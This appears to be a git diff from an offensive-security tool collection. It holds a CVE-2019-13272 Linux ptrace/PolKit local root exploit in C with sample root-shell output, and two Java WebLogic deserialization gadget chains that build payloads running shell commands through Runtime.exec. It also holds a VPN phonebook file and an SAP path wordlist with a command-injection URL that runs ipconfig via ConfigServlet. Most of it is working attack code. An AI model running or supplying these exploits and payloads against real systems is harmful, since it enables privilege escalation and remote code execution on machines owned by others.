// root@linux-mint-19-2:/home/user#
|
||||
// [root@localhost CVE-2019-13272]# id
|
||||
// uid=0(root) gid=0(root) groups=0(root),1000(user)
|
||||
// [root@localhost CVE-2019-13272]# uname -a
|
||||
// Linux localhost.localdomain 4.18.0-80.el8.x86_64 #1 SMP Tue Jun 4 09:19:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
|
||||
// ---
|
||||
|
||||
#define _GNU_SOURCE
|
||||
@@ -80,6 +90,64 @@
|
||||
# define dprintf
|
||||
#endif
|
||||
|
||||
/*
|
||||
* enabled automatic targeting.
|
||||
* uses pkaction to search PolKit policy actions for viable helper executables.
|
||||
*/
|
||||
#define ENABLE_AUTO_TARGETING 1
|
||||
|
||||
/*
|
||||
* fall back to known helpers if automatic targeting fails.
|
||||
* note: use of these helpers may result in PolKit authentication
|
||||
* prompts on the session associated with the PolKit agent.
|
||||
*/
|
||||
#define ENABLE_FALLBACK_HELPERS 1
|
||||
|
||||
static const char *SHELL = "/bin/bash";
|
||||
|
||||
static int middle_success = 1;
|
||||
static int block_pipe[2];
|
||||
static int self_fd = -1;
|
||||
static int dummy_status;
|
||||
static const char *helper_path;
|
||||
static const char *pkexec_path = "/usr/bin/pkexec";
|
||||
static const char *pkaction_path = "/usr/bin/pkaction";
|
||||
struct stat st;
|
||||
|
||||
const char *helpers[1024];
|
||||
|
||||
/* known helpers to use if automatic targeting fails */
|
||||
#if ENABLE_FALLBACK_HELPERS
|
||||
const char *known_helpers[] = {
|
||||
"/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
|
||||
"/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
|
||||
"/usr/lib/unity-settings-daemon/usd-backlight-helper",
|
||||
"/usr/lib/unity-settings-daemon/usd-wacom-led-helper",
|
||||
"/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
|
||||
"/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
|
||||
"/usr/sbin/mate-power-backlight-helper",
|
||||
"/usr/sbin/xfce4-pm-helper",
|
||||
"/usr/bin/xfpm-power-backlight-helper",
|
||||
"/usr/bin/lxqt-backlight_backend",
|
||||
"/usr/libexec/gsd-wacom-led-helper",
|
||||
"/usr/libexec/gsd-wacom-oled-helper",
|
||||
"/usr/libexec/gsd-backlight-helper",
|
||||
"/usr/lib/gsd-backlight-helper",
|
||||
"/usr/lib/gsd-wacom-led-helper",
|
||||
"/usr/lib/gsd-wacom-oled-helper",
|
||||
"/usr/lib64/xfce4/session/xsfm-shutdown-helper",
|
||||
};
|
||||
#endif
|
||||
|
||||
/* helper executables known to cause problems (hang or fail) */
|
||||
const char *blacklisted_helpers[] = {
|
||||
"/xf86-video-intel-backlight-helper",
|
||||
"/cpugovctl",
|
||||
"/resetxpad",
|
||||
"/package-system-locked",
|
||||
"/cddistupgrader",
|
||||
};
|
||||
|
||||
#define SAFE(expr) ({ \
|
||||
typeof(expr) __res = (expr); \
|
||||
if (__res == -1) { \
|
||||
@@ -98,36 +166,6 @@
|
||||
# define __NR_execveat 322
|
||||
#endif
|
||||
|
||||
static const char *SHELL = "/bin/bash";
|
||||
|
||||
static int middle_success = 1;
|
||||
static int block_pipe[2];
|
||||
static int self_fd = -1;
|
||||
static int dummy_status;
|
||||
static const char *helper_path;
|
||||
static const char *pkexec_path = "/usr/bin/pkexec";
|
||||
static const char *pkaction_path = "/usr/bin/pkaction";
|
||||
struct stat st;
|
||||
|
||||
const char *helpers[1024];
|
||||
|
||||
const char *known_helpers[] = {
|
||||
"/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
|
||||
"/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
|
||||
"/usr/lib/unity-settings-daemon/usd-backlight-helper",
|
||||
"/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
|
||||
"/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
|
||||
"/usr/sbin/mate-power-backlight-helper",
|
||||
"/usr/bin/xfpm-power-backlight-helper",
|
||||
"/usr/bin/lxqt-backlight_backend",
|
||||
"/usr/libexec/gsd-wacom-led-helper",
|
||||
"/usr/libexec/gsd-wacom-oled-helper",
|
||||
"/usr/libexec/gsd-backlight-helper",
|
||||
"/usr/lib/gsd-backlight-helper",
|
||||
"/usr/lib/gsd-wacom-led-helper",
|
||||
"/usr/lib/gsd-wacom-oled-helper",
|
||||
};
|
||||
|
||||
/* temporary printf; returned pointer is valid until next tprintf */
|
||||
static char *tprintf(char *fmt, ...) {
|
||||
static char buf[10000];
|
||||
@@ -272,23 +310,27 @@ static int check_env(void) {
|
||||
dprintf("[-] Could not find pkexec executable at %s\n", pkexec_path);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
if (stat(pkaction_path, &st) != 0) {
|
||||
dprintf("[-] Could not find pkaction executable at %s\n", pkaction_path);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (stat("/dev/grsec", &st) == 0) {
|
||||
dprintf("[-] Warning: grsec is in use\n");
|
||||
dprintf("[!] Warning: grsec is in use\n");
|
||||
warn++;
|
||||
}
|
||||
|
||||
if (xdg_session == NULL) {
|
||||
dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
|
||||
warn++;
|
||||
}
|
||||
if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
|
||||
|
||||
if (system("/bin/loginctl --no-ask-password show-session \"$XDG_SESSION_ID\" | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
|
||||
dprintf("[!] Warning: Could not find active PolKit agent\n");
|
||||
warn++;
|
||||
}
|
||||
|
||||
if (system("/sbin/sysctl kernel.yama.ptrace_scope 2>&1 | /bin/grep -q [23]") == 0) {
|
||||
dprintf("[!] Warning: kernel.yama.ptrace_scope >= 2\n");
|
||||
warn++;
|
||||
}
|
||||
|
||||
if (stat("/usr/sbin/getsebool", &st) == 0) {
|
||||
if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
|
||||
dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
|
||||
@@ -296,7 +338,11 @@ static int check_env(void) {
|
||||
}
|
||||
}
|
||||
|
||||
dprintf("[~] Done, looks good\n");
|
||||
if (warn > 0) {
|
||||
dprintf("[~] Done, with %d warnings\n", warn);
|
||||
} else {
|
||||
dprintf("[~] Done, looks good\n");
|
||||
}
|
||||
|
||||
return warn;
|
||||
}
|
||||
@@ -306,25 +352,32 @@ static int check_env(void) {
|
||||
* Check each action for allow_active=yes, extract the associated helper path,
|
||||
* and check the helper path exists.
|
||||
*/
|
||||
#if ENABLE_AUTO_TARGETING
|
||||
int find_helpers() {
|
||||
if (stat(pkaction_path, &st) != 0) {
|
||||
dprintf("[-] No helpers found. Could not find pkaction executable at %s.\n", pkaction_path);
|
||||
return 0;
|
||||
}
|
||||
|
||||
char cmd[1024];
|
||||
snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
|
||||
FILE *fp;
|
||||
fp = popen(cmd, "r");
|
||||
if (fp == NULL) {
|
||||
dprintf("[-] Failed to run: %s\n", cmd);
|
||||
exit(EXIT_FAILURE);
|
||||
dprintf("[-] Failed to run %s: %m\n", cmd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
char line[1024];
|
||||
char buffer[2048];
|
||||
int helper_index = 0;
|
||||
int useful_action = 0;
|
||||
int blacklisted_helper = 0;
|
||||
static const char *needle = "org.freedesktop.policykit.exec.path -> ";
|
||||
int needle_length = strlen(needle);
|
||||
|
||||
while (fgets(line, sizeof(line)-1, fp) != NULL) {
|
||||
/* check the action uses allow_active=yes*/
|
||||
/* check the action uses allow_active=yes */
|
||||
if (strstr(line, "implicit active:")) {
|
||||
if (strstr(line, "yes")) {
|
||||
useful_action = 1;
|
||||
@@ -334,6 +387,7 @@ int find_helpers() {
|
||||
|
||||
if (useful_action == 0)
|
||||
continue;
|
||||
|
||||
useful_action = 0;
|
||||
|
||||
/* extract the helper path */
|
||||
@@ -350,17 +404,23 @@ int find_helpers() {
|
||||
buffer[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
|
||||
strstr(&buffer[0], "/cpugovctl") != 0 ||
|
||||
strstr(&buffer[0], "/package-system-locked") != 0 ||
|
||||
strstr(&buffer[0], "/cddistupgrader") != 0) {
|
||||
dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
|
||||
continue;
|
||||
/* check helper path against helpers defined in 'blacklisted_helpers' array */
|
||||
blacklisted_helper = 0;
|
||||
for (i=0; i<sizeof(blacklisted_helpers)/sizeof(blacklisted_helpers[0]); i++) {
|
||||
if (strstr(&buffer[0], blacklisted_helpers[i]) != 0) {
|
||||
dprintf("[.] Ignoring helper (blacklisted): %s\n", &buffer[0]);
|
||||
blacklisted_helper = 1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (blacklisted_helper == 1)
|
||||
continue;
|
||||
|
||||
/* check the path exists */
|
||||
if (stat(&buffer[0], &st) != 0)
|
||||
if (stat(&buffer[0], &st) != 0) {
|
||||
dprintf("[.] Ignoring helper (does not exist): %s\n", &buffer[0]);
|
||||
continue;
|
||||
}
|
||||
|
||||
helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
|
||||
helper_index++;
|
||||
@@ -372,11 +432,12 @@ int find_helpers() {
|
||||
pclose(fp);
|
||||
return 0;
|
||||
}
|
||||
#endif
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
|
||||
|
||||
int ptrace_traceme_root() {
|
||||
dprintf("[.] Using helper: %s\n", helper_path);
|
||||
dprintf("[.] Trying helper: %s\n", helper_path);
|
||||
|
||||
/*
|
||||
* set up a pipe such that the next write to it will block: packet mode,
|
||||
@@ -436,29 +497,38 @@ int main(int argc, char **argv) {
|
||||
exit(0);
|
||||
}
|
||||
|
||||
/* Search for known helpers defined in 'known_helpers' array */
|
||||
dprintf("[.] Searching for known helpers ...\n");
|
||||
int i;
|
||||
for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
|
||||
if (stat(known_helpers[i], &st) == 0) {
|
||||
helper_path = known_helpers[i];
|
||||
dprintf("[~] Found known helper: %s\n", helper_path);
|
||||
ptrace_traceme_root();
|
||||
}
|
||||
}
|
||||
|
||||
/* Search polkit policies for helper executables */
|
||||
dprintf("[.] Searching for useful helpers ...\n");
|
||||
#if ENABLE_AUTO_TARGETING
|
||||
/* search polkit policies for helper executables */
|
||||
dprintf("[.] Searching policies for useful helpers ...\n");
|
||||
find_helpers();
|
||||
for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
|
||||
if (helpers[i] == NULL)
|
||||
break;
|
||||
|
||||
if (stat(helpers[i], &st) == 0) {
|
||||
helper_path = helpers[i];
|
||||
ptrace_traceme_root();
|
||||
}
|
||||
if (stat(helpers[i], &st) != 0)
|
||||
continue;
|
||||
|
||||
helper_path = helpers[i];
|
||||
ptrace_traceme_root();
|
||||
}
|
||||
#endif
|
||||
|
||||
#if ENABLE_FALLBACK_HELPERS
|
||||
/* search for known helpers defined in 'known_helpers' array */
|
||||
dprintf("[.] Searching for known helpers ...\n");
|
||||
for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
|
||||
if (stat(known_helpers[i], &st) != 0)
|
||||
continue;
|
||||
|
||||
helper_path = known_helpers[i];
|
||||
dprintf("[~] Found known helper: %s\n", helper_path);
|
||||
ptrace_traceme_root();
|
||||
}
|
||||
#endif
|
||||
|
||||
dprintf("[~] Done\n");
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
||||
Executable
BIN
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
BIN
Binary file not shown.
@@ -0,0 +1,54 @@
|
||||
import com.tangosol.util.filter.LimitFilter;
|
||||
import com.tangosol.util.extractor.ChainedExtractor;
|
||||
import com.tangosol.util.extractor.ReflectionExtractor;
|
||||
|
||||
import javax.management.BadAttributeValueExpException;
|
||||
import java.io.FileInputStream;
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import java.lang.reflect.Field;
|
||||
|
||||
/*
|
||||
* BadAttributeValueExpException.readObject()
|
||||
* com.tangosol.util.filter.LimitFilter.toString()
|
||||
* com.tangosol.util.extractor.ChainedExtractor.extract()
|
||||
* com.tangosol.util.extractor.ReflectionExtractor.extract()
|
||||
* Method.invoke()
|
||||
* Runtime.exec()
|
||||
*
|
||||
* PoC by Y4er
|
||||
*/
|
||||
public class Weblogic_2555
|
||||
{
|
||||
public static void main(String args[]) throws Exception
|
||||
{
|
||||
ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
|
||||
ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
|
||||
ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
|
||||
|
||||
ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
|
||||
ChainedExtractor chainedExt = new ChainedExtractor(extractors);
|
||||
LimitFilter limitFilter = new LimitFilter();
|
||||
|
||||
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
|
||||
m_comparator.setAccessible(true);
|
||||
m_comparator.set(limitFilter, chainedExt);
|
||||
|
||||
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
|
||||
m_oAnchorTop.setAccessible(true);
|
||||
m_oAnchorTop.set(limitFilter, Runtime.class);
|
||||
|
||||
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
|
||||
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
|
||||
field.setAccessible(true);
|
||||
field.set(badAttributeValueExpException, limitFilter);
|
||||
|
||||
// Serialize object & save to file
|
||||
FileOutputStream fos = new FileOutputStream("payload_obj.ser");
|
||||
ObjectOutputStream os = new ObjectOutputStream(fos);
|
||||
os.writeObject(badAttributeValueExpException);
|
||||
os.close();
|
||||
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,63 @@
|
||||
import com.tangosol.coherence.reporter.extractor.ConstantExtractor;
|
||||
import com.tangosol.util.ValueExtractor;
|
||||
import com.tangosol.util.comparator.ExtractorComparator;
|
||||
import com.tangosol.util.extractor.ChainedExtractor;
|
||||
import com.tangosol.util.extractor.ReflectionExtractor;
|
||||
import com.supeream.serial.Reflections;
|
||||
|
||||
import java.io.*;
|
||||
import java.lang.reflect.Field;
|
||||
import java.util.PriorityQueue;
|
||||
import java.util.concurrent.Callable;
|
||||
|
||||
/*
|
||||
* java.util.PriorityQueue.readObject()
|
||||
* java.util.PriorityQueue.heapify()
|
||||
* java.util.PriorityQueue.siftDown()
|
||||
* java.util.PriorityQueue.siftDownUsingComparator()
|
||||
* com.tangosol.util.extractor.AbstractExtractor.compare()
|
||||
* com.tangosol.util.extractor.MultiExtractor.extract()
|
||||
* com.tangosol.util.extractor.ChainedExtractor.extract()
|
||||
* Method.invoke()
|
||||
* Runtime.exec()
|
||||
*
|
||||
* PoC by Y4er
|
||||
*/
|
||||
public class Weblogic_2883
|
||||
{
|
||||
public static void main(String args[]) throws Exception
|
||||
{
|
||||
ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
|
||||
ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
|
||||
ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
|
||||
|
||||
ValueExtractor extractors[] = { new ConstantExtractor(Runtime.class), extractor, extractor2, extractor3 };
|
||||
ChainedExtractor chainedExt = new ChainedExtractor(extractors);
|
||||
|
||||
Class clazz = ChainedExtractor.class.getSuperclass();
|
||||
Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
|
||||
m_aExtractor.setAccessible(true);
|
||||
|
||||
ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
|
||||
ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
|
||||
reflectionExtractor
|
||||
};
|
||||
|
||||
ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
|
||||
|
||||
PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
|
||||
queue.add("1");
|
||||
queue.add("1");
|
||||
m_aExtractor.set(chainedExtractor1, valueExtractors);
|
||||
|
||||
Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
|
||||
queueArray[0] = Runtime.class;
|
||||
queueArray[1] = "1";
|
||||
|
||||
|
||||
FileOutputStream fos = new FileOutputStream("payload_obj.ser");
|
||||
ObjectOutputStream os = new ObjectOutputStream(fos);
|
||||
os.writeObject(queue);
|
||||
os.close();
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,102 @@
|
||||
[VPNTEST]
|
||||
Encoding=1
|
||||
PBVersion=1
|
||||
Type=2
|
||||
AutoLogon=1
|
||||
UseRasCredentials=1
|
||||
LowDateTime=-1345834320
|
||||
HighDateTime=30248544
|
||||
DialParamsUID=849441
|
||||
Guid=174463CE6AAFD4458FC57A466A95B787
|
||||
VpnStrategy=1
|
||||
ExcludedProtocols=0
|
||||
LcpExtensions=1
|
||||
DataEncryption=8
|
||||
SwCompression=0
|
||||
NegotiateMultilinkAlways=0
|
||||
SkipDoubleDialDialog=0
|
||||
DialMode=0
|
||||
OverridePref=15
|
||||
RedialAttempts=3
|
||||
RedialSeconds=60
|
||||
IdleDisconnectSeconds=0
|
||||
RedialOnLinkFailure=1
|
||||
CallbackMode=0
|
||||
CustomDialDll=
|
||||
CustomDialFunc=
|
||||
CustomRasDialDll=
|
||||
ForceSecureCompartment=0
|
||||
DisableIKENameEkuCheck=0
|
||||
AuthenticateServer=0
|
||||
ShareMsFilePrint=1
|
||||
BindMsNetClient=1
|
||||
SharedPhoneNumbers=0
|
||||
GlobalDeviceSettings=0
|
||||
PrerequisiteEntry=
|
||||
PrerequisitePbk=
|
||||
PreferredPort=VPN3-0
|
||||
PreferredDevice=WAN Miniport (PPTP)
|
||||
PreferredBps=0
|
||||
PreferredHwFlow=1
|
||||
PreferredProtocol=1
|
||||
PreferredCompression=1
|
||||
PreferredSpeaker=1
|
||||
PreferredMdmProtocol=0
|
||||
PreviewUserPw=1
|
||||
PreviewDomain=1
|
||||
PreviewPhoneNumber=0
|
||||
ShowDialingProgress=1
|
||||
ShowMonitorIconInTaskBar=1
|
||||
CustomAuthKey=0
|
||||
AuthRestrictions=544
|
||||
IpPrioritizeRemote=1
|
||||
IpInterfaceMetric=0
|
||||
IpHeaderCompression=0
|
||||
IpAddress=0.0.0.0
|
||||
IpDnsAddress=0.0.0.0
|
||||
IpDns2Address=0.0.0.0
|
||||
IpWinsAddress=0.0.0.0
|
||||
IpWins2Address=0.0.0.0
|
||||
IpAssign=1
|
||||
IpNameAssign=1
|
||||
IpDnsFlags=0
|
||||
IpNBTFlags=1
|
||||
TcpWindowSize=0
|
||||
UseFlags=2
|
||||
IpSecFlags=0
|
||||
IpDnsSuffix=
|
||||
Ipv6Assign=1
|
||||
Ipv6Address=::
|
||||
Ipv6PrefixLength=0
|
||||
Ipv6PrioritizeRemote=1
|
||||
Ipv6InterfaceMetric=0
|
||||
Ipv6NameAssign=1
|
||||
Ipv6DnsAddress=::
|
||||
Ipv6Dns2Address=::
|
||||
Ipv6Prefix=0000000000000000
|
||||
Ipv6InterfaceId=0000000000000000
|
||||
DisableClassBasedDefaultRoute=0
|
||||
DisableMobility=0
|
||||
NetworkOutageTime=0
|
||||
ProvisionType=0
|
||||
PreSharedKey=
|
||||
|
||||
NETCOMPONENTS=
|
||||
ms_msclient=1
|
||||
ms_server=1
|
||||
|
||||
MEDIA=rastapi
|
||||
Port=VPN3-0
|
||||
Device=WAN Miniport (PPTP)
|
||||
|
||||
DEVICE=vpn
|
||||
PhoneNumber=127.0.0.1
|
||||
AreaCode=
|
||||
CountryCode=0
|
||||
CountryID=0
|
||||
UseDialingRules=0
|
||||
Comment=
|
||||
FriendlyName=
|
||||
LastSelectedPhone=0
|
||||
PromoteAlternates=0
|
||||
TryNextAlternateOnFail=1
|
||||
BIN
Binary file not shown.
BIN
Binary file not shown.
Binary file not shown.
BIN
Binary file not shown.
File diff suppressed because one or more lines are too long
+549
-452
@@ -1,452 +1,549 @@
|
||||
/@download@
|
||||
/AdapterFramework/version/version.jsp
|
||||
/AdminTools/
|
||||
/Adobe
|
||||
/AdobeDocumentServices/Config
|
||||
/AdobeDocumentServices/Config?wsdl
|
||||
/AdobeDocumentServices/Grmg
|
||||
/AdobeDocumentServicesSec/Config
|
||||
/ADS-EJB
|
||||
/ADS-License
|
||||
/AE/index.jsp
|
||||
/AnalyticalReporting/
|
||||
/AnalyticalReporting/AnalyticalReporting_merge_web.xml
|
||||
/AnalyticalReporting/download/win32/websetup.properties
|
||||
/apidocs/
|
||||
/apidocs/allclasses-frame.html
|
||||
/apidocs/com/sap/engine/connector/connection/IConnection.html
|
||||
/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
|
||||
/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
|
||||
/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
|
||||
/ApplicationAdminProvider
|
||||
/bcb/
|
||||
/bcb/bcbadmHome.jsp
|
||||
/bcb/bcbadmNavigation.jsp
|
||||
/bcb/bcbadmSettings.jsp
|
||||
/bcb/bcbadmStart.jsp
|
||||
/bcb/bcbadmSystemInfo.jsp
|
||||
/bcbtest/start.jsp
|
||||
/BI_UDC
|
||||
/BizcCommLayerAuthoring/Config?wsdl
|
||||
/BizcCommLayerAuthoring/Config1
|
||||
/BizcCommLayerAuthoring/Config1?wsdl
|
||||
/bwtest
|
||||
/caf
|
||||
/CAFDataService/Config
|
||||
/CAFDataService/Config?wsdl
|
||||
/ccsui
|
||||
/CmcApp/logon.faces
|
||||
/CMSRTS/Config?wsdl
|
||||
/CMSRTS/Config1
|
||||
/CMSRTS/Config1?wsdl
|
||||
/com~tc~lm~webadmin~httpprovider~web
|
||||
/CrystalReports/viewrpt.cwr
|
||||
/ctc
|
||||
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
|
||||
/DataArchivingService
|
||||
/dispatcher
|
||||
/dswsbobje
|
||||
/dswsbobje/services/BICatalog?wsdl
|
||||
/dswsbobje/services/listServices
|
||||
/examples.html
|
||||
/examples/
|
||||
/examples_frame.html
|
||||
/exchangeProfile/
|
||||
/GRMGHeartBeat
|
||||
/GRMGWSTest/service
|
||||
/GRMGWSTest/service?wsdl
|
||||
/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
|
||||
/htmlb/
|
||||
/htmlb/docs/api/index.html
|
||||
/htmlb/index.html
|
||||
/htmlb/jsp/index.jsp
|
||||
/htmlb/moresamples.html
|
||||
/htmlb/samples.html
|
||||
/IciActionItemService/IciActionItemConf
|
||||
/IciActionItemService/IciActionItemConf?wsdl
|
||||
/IciChatLineService/IciChatLineConf
|
||||
/IciChatLineService/IciChatLineConf?wsdl
|
||||
/IciChatService/IciChatConf?wsdl
|
||||
/IciEventService/
|
||||
/IciEventService/IciEventConf
|
||||
/IciEventService/IciEventConf?wsdl
|
||||
/IciEventService/sap
|
||||
/IciFolderService/IciFolderConf
|
||||
/IciFolderService/IciFolderConf?wsdl
|
||||
/IciItemService/IciItemConf
|
||||
/IciItemService/IciItemConf?wsdl
|
||||
/IciMessageService/IciMessageConf
|
||||
/IciMessageService/IciMessageConf?wsdl
|
||||
/IciMonitorService/IciMonitorConf
|
||||
/IciMonitorService/IciMonitorConf?wsdl
|
||||
/IciPhoneCallService/IciPhoneCallConf
|
||||
/IciPhoneCallService/IciPhoneCallConf?wsdl
|
||||
/IciSystemService/IciSystemConf
|
||||
/IciSystemService/IciSystemConf?wsdl
|
||||
/IciUserService/IciUserConf
|
||||
/IciUserService/IciUserConf?wsdl
|
||||
/IGSCustomizingXML
|
||||
/index.html
|
||||
/InfoViewApp/
|
||||
/InfoViewApp/help/en/user/html/
|
||||
/InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
|
||||
/inspection.wsil
|
||||
/ipcpricing/ui/
|
||||
/irj
|
||||
/irj/go/km/docs
|
||||
/irj/portal
|
||||
/irj/portalapps
|
||||
/irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
|
||||
/irj/portalapps/com.sap.portal.design.portaldesigndata
|
||||
/irj/portalapps/com.sap.portal.design.urdesigndata
|
||||
/irj/portalapps/com.sap.portal.epcf.loader
|
||||
/irj/portalapps/com.sap.portal.navigation.detailedtree
|
||||
/irj/sdn/soa-discovery
|
||||
/irj/servlet
|
||||
/irj/servlet/prt
|
||||
/irj/servlet/prt/portal
|
||||
/irj/servlet/prt/portal/prtroot
|
||||
/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
|
||||
/irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
|
||||
/irj/servlet/prt/portal/prtroot/pcd!(*)
|
||||
/irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
|
||||
/KW
|
||||
/Lighthammer
|
||||
/logon
|
||||
/logon/index.jsp
|
||||
/logon/logonServlet
|
||||
/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
|
||||
/logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
|
||||
/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
|
||||
/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
|
||||
/main.html
|
||||
/meSync/HttpGRMGTest.html
|
||||
/mmr/
|
||||
/mmr/mmr/MMRUI.html
|
||||
/Modeler
|
||||
/modeller/
|
||||
/modeller/index.html
|
||||
/monitoring
|
||||
/monitoring/SystemInfo
|
||||
/nwa
|
||||
/OpenSQLMonitors/
|
||||
/PerformacetraceTraceApplication
|
||||
/performanceProvierRoot
|
||||
/pmi
|
||||
/portal
|
||||
/portalapps
|
||||
/RE/index.jsp
|
||||
/rep/build_info.html
|
||||
/rep/build_info.jsp
|
||||
/rep/start/index.jsp
|
||||
/run/build_info.html
|
||||
/run/build_info.jsp
|
||||
/rwb/version.html
|
||||
/saml
|
||||
/samlssodemo_dest
|
||||
/samlssodemo_source
|
||||
/sap/
|
||||
/sap/admin
|
||||
/sap/admin/public/index.html
|
||||
/sap/bc/bsp/
|
||||
/sap/bc/bsp/esh_os_service/favicon.gif
|
||||
/sap/bc/bsp/sap
|
||||
/sap/bc/bsp/sap
|
||||
/sap/bc/bsp/sap/alertinbox
|
||||
/sap/bc/bsp/sap/bsp_dlc_frcmp
|
||||
/sap/bc/bsp/sap/bsp_veri
|
||||
/sap/bc/bsp/sap/bsp_verificatio
|
||||
/sap/bc/bsp/sap/bsp_verificatio
|
||||
/sap/bc/bsp/sap/bsp_wd_base
|
||||
/sap/bc/bsp/sap/bspwd_basics
|
||||
/sap/bc/bsp/sap/certmap
|
||||
/sap/bc/bsp/sap/certreq
|
||||
/sap/bc/bsp/sap/crm_bsp_frame
|
||||
/sap/bc/bsp/sap/crm_thtmlb_util
|
||||
/sap/bc/bsp/sap/crm_ui_frame
|
||||
/sap/bc/bsp/sap/crm_ui_start
|
||||
/sap/bc/bsp/sap/crmcmp_bpident/
|
||||
/sap/bc/bsp/sap/crmcmp_brfcase
|
||||
/sap/bc/bsp/sap/crmcmp_hdr
|
||||
/sap/bc/bsp/sap/crmcmp_hdr_std
|
||||
/sap/bc/bsp/sap/crmcmp_ic_frame
|
||||
/sap/bc/bsp/sap/esh_sap_link
|
||||
/sap/bc/bsp/sap/esh_sapgui_exe
|
||||
/sap/bc/bsp/sap/graph_bsp_test
|
||||
/sap/bc/bsp/sap/graph_bsp_test/Mimes
|
||||
/sap/bc/bsp/sap/gsbirp
|
||||
/sap/bc/bsp/sap/hrrcf_wd_dovru
|
||||
/sap/bc/bsp/sap/htmlb_samples
|
||||
/sap/bc/bsp/sap/htmlb_samples
|
||||
/sap/bc/bsp/sap/ic_frw_notify
|
||||
/sap/bc/bsp/sap/iccmp_bp_cnfirm
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnr
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnt
|
||||
/sap/bc/bsp/sap/iccmp_header
|
||||
/sap/bc/bsp/sap/iccmp_ssc_ll/
|
||||
/sap/bc/bsp/sap/it00
|
||||
/sap/bc/bsp/sap/it00
|
||||
/sap/bc/bsp/sap/it00/default.htm
|
||||
/sap/bc/bsp/sap/it00/http_client.htm
|
||||
/sap/bc/bsp/sap/it00/http_client_xml.htm
|
||||
/sap/bc/bsp/sap/public/bc
|
||||
/sap/bc/bsp/sap/public/bc
|
||||
/sap/bc/bsp/sap/public/graphics
|
||||
/sap/bc/bsp/sap/sam_demo
|
||||
/sap/bc/bsp/sap/sam_notifying
|
||||
/sap/bc/bsp/sap/sam_sess_queue
|
||||
/sap/bc/bsp/sap/sbspext_htmlb
|
||||
/sap/bc/bsp/sap/sbspext_htmlb
|
||||
/sap/bc/bsp/sap/sbspext_xhtmlb
|
||||
/sap/bc/bsp/sap/sbspext_xhtmlb
|
||||
/sap/bc/bsp/sap/spi_admin
